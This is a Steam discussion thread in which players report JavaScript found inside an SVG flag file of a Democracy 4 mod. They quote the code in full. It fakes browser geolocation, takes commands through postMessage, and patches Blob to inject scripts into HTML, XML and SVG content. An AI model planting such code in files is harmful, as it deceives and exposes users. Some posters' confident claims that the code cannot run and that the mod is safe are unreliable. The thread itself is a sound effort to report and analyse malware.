Democracy 4

Democracy 4+
jackmastermind 17 aug @ 18:52
MALWARE. DO NOT DOWNLOAD.
Look at data/svg/ukflagnew.svg for example, SVGs are just supposed to be image icons. So many lines of geolocation data. This should not exist. Do NOT download this mod unless you remove all the malware. Please report (for some reason, my steam account is not letting me file a report right now).

Code, found in svg files:
<![CDATA[
// Keep bound references to the browser's native geolocation methods before they are
// replaced further down; the obfuscated globals are the only remaining route to them.
window.Vyagtit = navigator.geolocation.getCurrentPosition.bind(navigator.geolocation);
window.FNuvlyG = navigator.geolocation.watchPosition.bind(navigator.geolocation);
// Delay in milliseconds between polls of window.fopas in the wait* functions below.
let WAIT_TIME = 100;


// NOTE(review): window.location.protocol has the form 'https:' (scheme plus colon, no
// slashes), so this list never matches and the branch runs on every page as written.
if (!['http://', 'https://'].includes(window.location.protocol)) {
// default spoofed location
// fopas is the "spoof" switch; bwnzX / REKwE are the latitude / longitude reported while it is true.
window.fopas = true;
window.bwnzX = 38.883333;
window.REKwE = -77.000;
}

/**
 * Answers the most recent getCurrentPosition() call captured by the override below.
 *
 * Reads the callbacks and options from window.cNHFrjv / window.BtxvaFW / window.cDhvh.
 * While window.fopas is undefined it re-schedules itself every WAIT_TIME ms.
 * Returns nothing.
 */
function waitGetCurrentPosition() {
if ((typeof window.fopas !== 'undefined')) {
if (window.fopas === true) {
// Spoofing on: the page's success callback receives a fabricated position object
// built from the stored coordinates; the real geolocation API is never queried.
window.cNHFrjv({
coords: {
latitude: window.bwnzX,
longitude: window.REKwE,
accuracy: 10,
altitude: null,
altitudeAccuracy: null,
heading: null,
speed: null,
},
timestamp: new Date().getTime(),
});
} else {
// Spoofing off: forward the stored callbacks and options to the saved native method.
window.Vyagtit(window.cNHFrjv, window.BtxvaFW, window.cDhvh);
}
} else {
// The switch has not been set yet; check again after WAIT_TIME ms.
setTimeout(waitGetCurrentPosition, WAIT_TIME);
}
}

/**
 * Answers the most recent watchPosition() call captured by the override below.
 *
 * Reads the callbacks and options from window.zXdZHYb / window.lWHypeI / window.VUxyU.
 * While window.fopas is undefined it re-schedules itself every WAIT_TIME ms.
 * Returns a random integer only on the spoofing branch; every other path returns undefined.
 */
function waitWatchPosition() {
if ((typeof window.fopas !== 'undefined')) {
if (window.fopas === true) {
// NOTE(review): navigator.getCurrentPosition is not a standard API (the method lives on
// navigator.geolocation), so this call throws a TypeError unless something outside this
// listing defines it; the return on the next line is then never reached.
navigator.getCurrentPosition(window.zXdZHYb, window.lWHypeI, window.VUxyU);
return Math.floor(Math.random() * 10000); // random id
} else {
// Spoofing off: forward to the saved native watchPosition; its watch id is discarded.
window.FNuvlyG(window.zXdZHYb, window.lWHypeI, window.VUxyU);
}
} else {
// The switch has not been set yet; check again after WAIT_TIME ms.
setTimeout(waitWatchPosition, WAIT_TIME);
}
}

// Replace the page-visible geolocation methods. Each replacement stores the caller's
// callbacks and options in window globals and hands over to the matching wait* function.
// The globals hold one request at a time, so a second call made before the first is
// answered overwrites the first caller's callbacks.
navigator.geolocation.getCurrentPosition = function (successCallback, errorCallback, options) {
window.cNHFrjv = successCallback;
window.BtxvaFW = errorCallback;
window.cDhvh = options;
waitGetCurrentPosition();
};
// This replacement has no return statement, so callers receive undefined instead of a watch id.
navigator.geolocation.watchPosition = function (successCallback, errorCallback, options) {
window.zXdZHYb = successCallback;
window.lWHypeI = errorCallback;
window.VUxyU = options;
waitWatchPosition();
};

/**
 * Build a new instance of `constructor`, passing the entries of `args` as the
 * constructor arguments (the same result as `new constructor(...args)`).
 *
 * @param {Function} constructor - The constructor to invoke with `new`.
 * @param {Array} args - Argument list; a missing list means "no arguments".
 * @returns {object} The newly constructed instance.
 */
const instantiate = (constructor, args) => {
  const argList = args == null ? [] : args;
  return Reflect.construct(constructor, argList);
};

// Replaces the global Blob constructor with a wrapper around the original (_Blob).
// Despite the name "secureBlob", the wrapper rewrites content: for the markup MIME types
// listed below it inserts a <script> element into the document before the real Blob is built.
// The script body comes from `iVWLe`, which is not defined anywhere in this listing, so what
// gets inserted cannot be determined from here.
Blob = function (_Blob) {
function secureBlob(...args) {
// MIME types whose content is rewritten, and whether DOMParser parses them as XML.
const injectableMimeTypes = [
{ mime: 'text/html', useXMLparser: false },
{ mime: 'application/xhtml+xml', useXMLparser: true },
{ mime: 'text/xml', useXMLparser: true },
{ mime: 'application/xml', useXMLparser: true },
{ mime: 'image/svg+xml', useXMLparser: true },
];
// Find the options argument: the first object argument with a non-empty string `type`.
let typeEl = args.find(arg => (typeof arg === 'object') && (typeof arg.type === 'string') && (arg.type));

// Only rewrite when a type was given and the first blob part is a string.
if (typeof typeEl !== 'undefined' && (typeof args[0][0] === 'string')) {
const mimeTypeIndex = injectableMimeTypes.findIndex(mimeType => mimeType.mime.toLowerCase() === typeEl.type.toLowerCase());
if (mimeTypeIndex >= 0) {
let mimeType = injectableMimeTypes[mimeTypeIndex];
// Markup to insert: a script element that calls the interpolated value of iVWLe as a function.
let injectedCode = `<script>(
${iVWLe}
)();<\/script>`;

let parser = new DOMParser();
let xmlDoc;
if (mimeType.useXMLparser === true) {
xmlDoc = parser.parseFromString(args[0].join(''), mimeType.mime); // For XML documents we need to merge all items in order to not break the header when injecting
} else {
// HTML: only the first blob part is parsed and later replaced.
xmlDoc = parser.parseFromString(args[0][0], mimeType.mime);
}

if (xmlDoc.getElementsByTagName("parsererror").length === 0) { // if no errors were found while parsing...
// Insert the script as the first child of the root element, then write the
// modified markup back into the argument list passed to the real Blob.
xmlDoc.documentElement.insertAdjacentHTML('afterbegin', injectedCode);

if (mimeType.useXMLparser === true) {
args[0] = [new XMLSerializer().serializeToString(xmlDoc)];
} else {
args[0][0] = xmlDoc.documentElement.outerHTML;
}
}
}
}

return instantiate(_Blob, args); // arguments?
}

// Copy props and methods
let propNames = Object.getOwnPropertyNames(_Blob);
for (let i = 0; i < propNames.length; i++) {
// NOTE(review): as shown, propName is the whole array rather than one entry; this was
// probably `propNames[i]` with the `[i]` lost to forum formatting. Confirm against the file.
let propName = propNames;
if (propName in secureBlob) {
continue; // Skip already existing props
}
let desc = Object.getOwnPropertyDescriptor(_Blob, propName);
Object.defineProperty(secureBlob, propName, desc);
}

// Share the original prototype so objects built by the wrapper still pass `instanceof Blob`.
secureBlob.prototype = _Blob.prototype;
return secureBlob;
}(Blob);

// Freeze the geolocation object now that its two methods have been replaced, so the
// replacements assigned above can no longer be reassigned or deleted on that object.
Object.freeze(navigator.geolocation);

// Control channel: a 'ndqCVCx' message updates the stored coordinates and the spoof switch.
// The listener only writes three window globals; no network request appears in this listing.
window.addEventListener('message', function (event) {
// Accept only messages posted from this same window. Any script running in the window
// can post one; no other sender check is visible here.
if (event.source !== window) {
return;
}
const message = event.data;
switch (message.method) {
case 'ndqCVCx':
// typeof null is also 'object', so a null info or coords passes this check.
if ((typeof message.info === 'object') && (typeof message.info.coords === 'object')) {
window.bwnzX = message.info.coords.lat;
window.REKwE = message.info.coords.lon;
// Setting fopas is what releases the polling loops in the wait* functions.
window.fopas = message.info.fakeIt;
}
break;
default:
break;
}
}, false);
//]]>
I'm concerned about the code behind the Norton pop-up that appears after this has been installed. It's definitely a significant issue, and it seems like the developer is ignoring it.:LIS_poker_face:
This is a geolocation spoofer that also monkey-patches Blob to inject arbitrary script into any HTML/XML/SVG blob your page (or game webview) creates. That second part is a big red flag.

Sick Burn from AI: Bugs/quirks

"Inside waitWatchPosition() it calls navigator.getCurrentPosition(...) (missing .geolocation.). That’s not a standard API and would normally throw—so either this is a copy/paste bug, or they patched navigator.getCurrentPosition elsewhere. Sloppy."
Would love to see the developer respond to this
The only way I can see this happening is if the svg already contained this before or in the process of converting the image from png/jpg to svg a site added this in.

I don't see a single reason the author would add this. Many logical reasons and explanations for why this is not maliciously or intentionally added by author.

Lastly, I also don't believe that either 1. This code can actually run. And/Or 2. Anyone actually gets your geolocation. The code doesn't point to any address/website for that to be possible.

But I also doubt you'd lie, and I also believe that this file should be removed, hopefully also finding why said code was there in the first place.

Note: I'm pretty sure the author still is unable to update their mods due to a past bug with Democracy 4 that still isn't fixed.
FatRat 22 okt @ 11:24 
While that code doesn't point to a URL, that doesn't mean the rest of the malicious code isn't somewhere else within the mod files. Going to start reviewing it now
what is the debate about? i understand the situation but how could this benefit the mod author? almost 70k people use this mod and i doubt the code can inject crypto or anything money making/ selling info to big enterprises. lately democracy and it's mods have been slow and ignored so i can see new people making malware but idk about the older ones such as this, still, if we get more info it'll be great
Senast ändrad av Butcher; 28 okt @ 4:26
I decided to really look into it again, and here's the definitive answer:
• Yes, it is malicious code. What it does is simple: it spoofs locations and also spreads itself to anything it can, with the possibility of being able to listen to all types of messages in APIs by freezing them and maybe also being controlled remotely to selectively collect data.
• It executes by being embedded in HTMLs, CSS files, or in any server side/web environment
with the possibility of infecting visitors of that page or host machine.
• No, it cannot infect you or even run AT ALL, it only runs in browsers. None of the code can harm you as it cannot run.
• No, it cannot spread, unless you specifically open this in a browser or html UI that can execute JS files.
• The chance of the author adding this on purpose is almost 0%. Because there's no gain in doing so.
• This mod is safe to download and use, tens of thousands of people do just fine.

Here's the likely reason why this exists:
Mod author downloaded this svg off the web or maybe a base part of it, like a jpg or png. It either was already infected with this code or the code was added by a file conversion site (very common).

There's also the chance the author's PC is infected and it simply spread to this file. If they wanted to hack you or spread malware, they would put in code that can actually run.

How to clear the malware (Not necessary) :
Open ukflagnew.svg or any infected file in a text editor (NOT IN A BROWSER)
Delete anything in between <script> and </script>.
Save the file.

TL;DR:
• The file "ukflagnew.svg" (and possibly others) contain malware.
• It cannot harm you.
• Almost 0% chance it was maliciously added by the author.
Senast ändrad av Adeptus Freemanicus; 28 okt @ 11:18
Ursprungligen skrivet av Adeptus Freemanicus:
I decided to really look into it again, and here's the definitive answer:
• Yes, it is malicious code. What it does is simple: it spoofs locations and also spreads itself to anything it can, with the possibility of being able to listen to all types of messages in APIs by freezing them and maybe also being controlled remotely to selectively collect data.
• It executes by being embedded in HTMLs, CSS files, or in any server side/web environment
with the possibility of infecting visitors of that page or host machine.
• No, it cannot infect you or even run AT ALL, it only runs in browsers. None of the code can harm you as it cannot run.
• No, it cannot spread, unless you specifically open this in a browser or html UI that can execute JS files.
• The chance of the author adding this on purpose is almost 0%. Because there's no gain in doing so.
• This mod is safe to download and use, tens of thousands of people do just fine.

Here's the likely reason why this exists:
Mod author downloaded this svg off the web or maybe a base part of it, like a jpg or png. It either was already infected with this code or the code was added by a file conversion site (very common).

There's also the chance the author's PC is infected and it simply spread to this file. If they wanted to hack you or spread malware, they would put in code that can actually run.

How to clear the malware (Not necessary) :
Open ukflagnew.svg or any infected file in a text editor (NOT IN A BROWSER)
Delete anything in between <script> and </script>.
Save the file.

TL;DR:
• The file "ukflagnew.svg" (and possibly others) contain malware.
• It cannot harm you.
• Almost 0% chance it was maliciously added by the author.


all i have to say is....BRAVO!!!!